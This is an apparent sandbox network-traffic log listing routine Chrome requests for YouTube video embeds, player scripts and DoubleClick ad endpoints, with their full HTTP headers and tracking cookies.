    Source: global trafficHTTP traffic detected: GET /embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/EqboAI-Vk-U?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=3 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/ZRCdORJiUgU?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=7 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/rokGy0huYEA?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=5 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/6aFdEhEZQjE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=9 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/vI4LHl4yFuo?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=11 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/KIViy7L_lo8?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=13 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/q7o7R5BgWDY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=15 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/DVwHCGAr_OE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=17 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/Lv-sY_z8MNs?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=19 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/xY_MUB8adEQ?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=21 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/SAIEamakLoY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=23 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /embed/F0QXB5pw2qE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=25 HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://about.google/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/www-player.css HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/www-embed-player.vflset/www-embed-player.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/player_ias.vflset/en_US/base.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /s/player/59acb1f3/fetch-polyfill.vflset/fetch-polyfill.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: YSC=jHyZ6VtWoME; VISITOR_INFO1_LIVE=oHkB9cuXkGw
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdU
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdU
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdU
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdUIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdUIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdU
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdU
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkzjscYZ52NAY8n0cT95jijV6W0yuM6NwF8WWQoBrDcA-yxPPCjwWHtVTdUIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1Host: static.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUloSSx62RoT13bCq798eIaZMtUoDNVc6WGwjISOIqwkmycF5maf5SrFCEuXIf-Modified-Since: Thu, 12 Dec 2013 23:40:16 GMT
    Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.youtube.comX-Client-Data: CI22yQEIpbbJAQjBtskBCKmdygEIk6HLAQj8qswBCLy8zAEI9bzMAQiywcwBCMTBzAEI18HMAQ==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUnfpPATwHt9Dtl02kqVHBT7V4SCZvGiWZXyF_uXtHxOtR-GM4bZhlBrqd6U
